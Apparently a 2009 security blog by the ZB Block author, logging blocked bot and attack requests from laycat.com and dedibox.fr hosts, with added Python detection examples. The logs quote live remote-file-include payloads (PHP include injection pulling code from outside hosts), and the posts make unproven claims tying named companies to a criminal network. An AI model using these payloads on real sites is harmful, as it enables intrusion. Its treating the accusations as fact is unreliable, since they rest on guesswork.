
Wednesday, April 15, 2009

PROOF THAT DEDIBOX.FR IS HOSTILE, and possibly laycat too.

Remember what I said about how no one notices the robber casing the joint, but everyone notices when he's committing (or has committed) the crime? Remember my go-arounds with laycat.com, kyklo.com, aceleo.com, and their more-than-willing-to-share-IP-space host, dedibox.fr?

Witness, if you will, a vengeance script attack on a well-defended website with two doors, and the results that are gleaned when a quick-minded sentry is guarding one of those doors. The problem is, the other door, the one our attacker will go through, does not lead to satisfaction, but to a grim reminder that they have stepped into... The Toilet Zone.

#: 6594 @: Tue, 14 Apr 2009 13:53:55 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6625 @: Tue, 14 Apr 2009 14:21:17 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Then again:

#: 6627 @: Tue, 14 Apr 2009 14:26:40 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6633 @: Tue, 14 Apr 2009 14:27:14 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Changing method to:

#: 6634 @: Tue, 14 Apr 2009 14:40:50 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6644 @: Tue, 14 Apr 2009 14:44:57 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Oh no, not again, just 2 this time...

#: 6663 @: Wed, 15 Apr 2009 00:20:15 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??

and...

#: 6664 @: Wed, 15 Apr 2009 00:20:27 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??

Now I know that none of these attacks came from laycat.com, aceleo.com, or kyklo.com addresses themselves. But I have shown, beyond reasonable doubt, that laycat uses other IPs in the dedibox.fr domain with great freedom and regularity. Draw your own conclusions, but I say they're RIDIN' DIRTY.

Please note that attack 3, consisting of 11 shots, occurred in 7 seconds, almost 2 slams a second... ZB Block handled it with grace, and did as it was supposed to.

All in all, it looks like I caught me a weasel in the hen house. dedibox.fr is now attacksville forever, and I suggest that, whatever blocking method your site uses, you ban the domain dedibox.fr until I see some good reason that their servers need to surf your site.
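The "Why blocked" lines in the entries above are a scoring rule set: each indicator found in the query string adds a point. Here is an added example of that kind of scoring, written for this page and not ZB Block's own code, run over the query strings quoted above (copied in as constructed sample data) plus a burst counter for the "11 shots in 7 seconds" pattern. The rule names, the `SAMPLE_HITS` timestamps, and the second source IP are assumptions constructed for the example; the decoder loop is there because the attacker switched from `%27` to the double-encoded `%2527` between the first and second entries.

```python
"""Added example, not ZB Block's code: score a query string for the indicators
named in the 'Why blocked' lines and count request bursts per source IP."""
import re
from collections import defaultdict
from datetime import timedelta
from email.utils import parsedate_to_datetime
from urllib.parse import unquote

# Constructed sample data: the first three are query strings quoted on the page.
SAMPLE_QUERIES = [
    "name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/"
    "&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????",
    "name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/"
    "&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????",
    "p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??",
    "name=PNphpBB2&file=viewtopic&t=8",  # an ordinary, harmless query for contrast
]

# Constructed (ip, RFC 2822 timestamp) hits: seven in six seconds, then a straggler.
SAMPLE_HITS = [
    ("88.191.89.65", "Tue, 14 Apr 2009 14:26:%02d -0600" % s) for s in range(40, 47)
] + [
    ("88.191.89.65", "Tue, 14 Apr 2009 14:40:50 -0600"),
    ("203.0.113.7", "Tue, 14 Apr 2009 14:26:41 -0600"),  # unrelated single visitor
]


def fully_decode(s: str, rounds: int = 3) -> str:
    """Undo URL encoding until it stops changing, so %2527 -> %27 -> ' is caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def score_query(query: str) -> list:
    """Return the names of the rules a query string trips; the score is len()."""
    decoded = fully_decode(query)
    reasons = []
    # A literal PHP superglobal such as $_GET[a] has no business in a URL.
    if re.search(r"\$_(GET|POST|REQUEST)\s*\[", decoded):
        reasons.append("PHP superglobal in query")
    # A raw '?' inside the query string (checked undecoded, so an encoded %3F
    # is fine) means a second URL was glued onto the request.
    if "?" in query:
        reasons.append("Unescaped question mark in query")
    # Any parameter value carrying scheme://host is a remote-include candidate.
    if re.search(r"=[^&]*https?://", decoded, re.IGNORECASE):
        reasons.append("Remote file include attack (http)")
    # PHP control-flow tokens riding along in a parameter value.
    if re.search(r"\b(include|require)(_once)?\s*\(|\bexit\b", decoded):
        reasons.append("PHP code in query")
    return reasons


def burst_counts(hits, window: timedelta = timedelta(seconds=7)) -> dict:
    """For each IP, the most hits that fall inside any sliding `window`."""
    by_ip = defaultdict(list)
    for ip, when in hits:
        by_ip[ip].append(parsedate_to_datetime(when))
    worst = {}
    for ip, times in by_ip.items():
        times.sort()
        best = start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        worst[ip] = best
    return worst


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        reasons = score_query(q)
        print(len(reasons), reasons, q[:60])
    print(burst_counts(SAMPLE_HITS))
```

Scoring on decoded text while checking the stray `?` on the raw string is deliberate: the include and superglobal tokens only show up once the double encoding is peeled off, whereas a properly escaped `%3F` is legitimate and should not count.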

Monday, March 30, 2009

Guess who?

Look who ignored robots.txt again after a couple of weeks.

#: 479 @: Mon, 30 Mar 2009 09:20:47 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/

So it's obviously not caching robots.txt and having problems with it propagating to the scanners, as they have claimed in an e-mail.

So now they are permanently §Hîtlisted as being part of the Russian Business Network. I have no doubts now... Oh wait, they might say that one was before they pulled robots.txt... but explain this one you a§§holes, over 2 hours later, and FAKING a http_referer from a protected page no less...

#: 482 @: Mon, 30 Mar 2009 11:42:48 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/zbblock.php

Oh, and btw, the same group of nogoodniks just slammed my friend's site for 100s of page pulls, in violation of robots.txt too. She's P.O.ed! Hell hath no wrath like a woman's robots.txt scorned.

Welcome to being labeled as pure RBN trash in my blocklists.

EDIT: I might also mention here, that laycat, kyklo, aceleo, and dedibox are now all blocked by ZB Block which can be downloaded for free here.

Zaphod "Some Heads are Gonna Roll" Breeblebrox Yeah, Judas Priest man!

Posted by Zaphod at 12:19 PM Mountain Daylight Time
Edited on: Wednesday, April 01, 2009 12:01 AM Mountain Daylight Time
Categories: Exploit Bot, RBN, Scan Bot, Stupid Bot

Friday, March 13, 2009

Laycat continues its stupidity...

Well, first customer of Friday the 13th... GUESS WHO?!?

#: 292 @: Fri, 13 Mar 2009 01:42:01 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/forum/

GRRRRR! Now, one of their ploys before was that they claim they don't pull robots.txt more than once in a while, and it was desynchronized the first time. They claim this is to reduce load on the server. Yeah, whatever; it doesn't take any time at all to send a short robots.txt. It's been a while. You didn't care, and started your crap again, getting into my site.

If this isn't a common 'sploit scanning probe with some fairly good sugar on top, I have no clue what it is. Every time it touches, the more I am sure of it.

Zap.

Thursday, March 12, 2009

Laycat and its ilk are finally machina non grata here.

Okay, a few months ago I had some chit-chat with the people running this service. They actually seemed to be on the up and up about it, and claimed several things that turned out not to be true. Here's some of what I found at fault with them.

  1. Their robot does NOT pay attention to robots.txt and has caused what amounts to a DoS attack on a friend's website. (Site got shut down due to an excessive usage spike.)
  2. Their registrar is also a favorite of the RBN.
  3. They claim they use 3 domain names, aceleo.com, laycat.com, and kyklo.com, to supposedly detect if a site is masquerading as something different to them, but this is also a lie, as they also probe from many points in the dedibox.fr domain!
  4. They ignore 403 FORBIDDENs and continue to slam them. More on that in a bit.
  5. It fakes HTTP referers to seem like it's already "in session". (Where have we seen THAT before?)
  6. Their bot masquerades as a browser. (Gee, ya reckon we've seen that too perhaps?)
  7. No word outside of their own that anything will come of them.

Whoo, that's a lot of black to say about anyone online, but, I got logs to share with you!

#: 263 @: Wed, 11 Mar 2009 17:47:41 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://spambotsecurity.com/

That was the first rejection; Laycat has received its first 403. It should not continue to try to go where it's not welcome, but...

#: 264 @: Wed, 11 Mar 2009 17:57:37 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://spambotsecurity.com/advice.php

Please note, it was never allowed to access the root in the first place, but somehow it now has a referer saying it was sent to this page from the root! (BULLS**T!) It's scraping Google or some other search engine for these URLs.
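The tell described here, a Referer naming a page that this same client was already refused, is a check a blocker can make mechanically. The following is an added example written for this page, not ZB Block's code: it replays a constructed sequence of hits mirroring the entries above (the `203.0.113.7` visitor is made up as a control) and flags any request whose Referer was itself a 403 for that client. The `client_key` parameter is an assumption added so the check can also be keyed on a wider address prefix, which is what it takes to catch the hand-off to the dedibox.fr host that follows.

```python
"""Added example, not ZB Block's code: flag requests whose Referer names a page
this client was already refused. Sample hits are constructed for the example."""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed (client_ip, requested_url, referer, status) hits, in arrival order.
SAMPLE_HITS = [
    ("88.191.79.43", "http://spambotsecurity.com/", "", 403),
    ("88.191.79.43", "http://spambotsecurity.com/advice.php", "http://spambotsecurity.com/", 403),
    ("88.191.79.43", "http://www.spambotsecurity.com/about.php", "http://www.spambotsecurity.com/", 403),
    # Same operator switching to a second host: a per-IP check misses this one.
    ("88.191.88.79", "http://www.spambotsecurity.com/anti-spyware.php", "http://www.spambotsecurity.com/", 403),
    # Control: an ordinary visitor who really did come from the front page.
    ("203.0.113.7", "http://www.spambotsecurity.com/", "", 200),
    ("203.0.113.7", "http://www.spambotsecurity.com/advice.php", "http://www.spambotsecurity.com/", 200),
]


def normalize(url: str) -> tuple:
    """Compare URLs by host and path only; 'www.' and a bare '/' are folded."""
    parts = urlsplit(url)
    host = parts.netloc.lower()
    if host.startswith("www."):
        host = host[4:]
    return host, parts.path or "/"


def audit(hits, client_key=lambda ip: ip) -> list:
    """Return (client_ip, url, reason) for every hit whose Referer points at a
    page that was already refused (403) to the same client, as grouped by
    client_key. Hits are processed in order, so only earlier refusals count."""
    denied = defaultdict(set)  # client_key -> set of normalized refused URLs
    findings = []
    for ip, url, referer, status in hits:
        key = client_key(ip)
        if referer and normalize(referer) in denied[key]:
            findings.append((ip, url, "Referer %s was refused to this client earlier" % referer))
        if status == 403:
            denied[key].add(normalize(url))
    return findings


def slash16(ip: str) -> str:
    """Constructed grouping key: the first two octets of an IPv4 address."""
    return ".".join(ip.split(".")[:2])


if __name__ == "__main__":
    for finding in audit(SAMPLE_HITS):
        print("per-IP:", finding)
    for finding in audit(SAMPLE_HITS, client_key=slash16):
        print("per-/16:", finding)
```

Keyed on the exact IP, the check catches the two laycat.com hits but not the dedibox.fr host that picks up the same faked Referer; keyed on the wider prefix it catches all three. How wide to group is a judgement call for the site operator, since a coarse key will also lump unrelated customers of the same hosting company together.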

#: 265 @: Wed, 11 Mar 2009 19:37:11 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/about.php

It tries 2 more URLs, both giving 403s, with the reason they were blocked. Then to be crafty, they pull the ace out of their sleeve, but I was waiting for it. (Remember, ZB Block doesn't like a lot of server farms, as they usually have no business surfing other sites.)

#: 266 @: Wed, 11 Mar 2009 19:44:56 -0600
Host: sd-16074.dedibox.fr
IP: 88.191.88.79
Score: 1
Why blocked: Bothost / Server.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/anti-spyware.php

THROUGH

#: 271 @: Wed, 11 Mar 2009 20:24:13 -0600
Host: sd-16074.dedibox.fr
IP: 88.191.88.79
Score: 1
Why blocked: Bothost / Server.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/contact.php

And then right back into laycat, and dedibox again for 10 more connects up to:

#: 281 @: Wed, 11 Mar 2009 22:00:24 -0600
Host: sd-16074.dedibox.fr
IP: 88.191.88.79
Score: 1
Why blocked: Bothost / Server.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/tos.php

GAWD! How stupid can a bot be? Each connection resulted in a 403, each connection ignored robots.txt, each connection did not announce itself via user agent as a search engine robot.

My thoughts on this? Well, they aren't nice. To put it bluntly and succinctly, I smell a rat.

To go into detail on my thoughts, I honestly think this is the "innocent" (cough) arm of the Russian Business Network.

One of the Russkies' favorite things to do is name their network something like "<something>box.tld". Well, dedibox.fr fits the mold. Why would they have a scan-only network? Because no one ever really catches the thief casing the joint he's going to rob. It's only during the burglary that they get noticed. The problem is, the burglar is locked up on the internet (blacklisted) and is not able to snoop elsewhere. If you split your surveillance and attack portions, no one ever expects the snoop, well, no one who isn't into security at least. I will keep investigating. And as for now I am NOT SURE this is RBN, but it feels that way, and it shall be blocked in ZB Block's signature update #21.

Zap.

Posted by Zaphod at 8:40 PM Mountain Daylight Time
Edited on: Thursday, March 12, 2009 9:32 PM Mountain Daylight Time
Categories: RBN, Scan Bot, Stupid Bot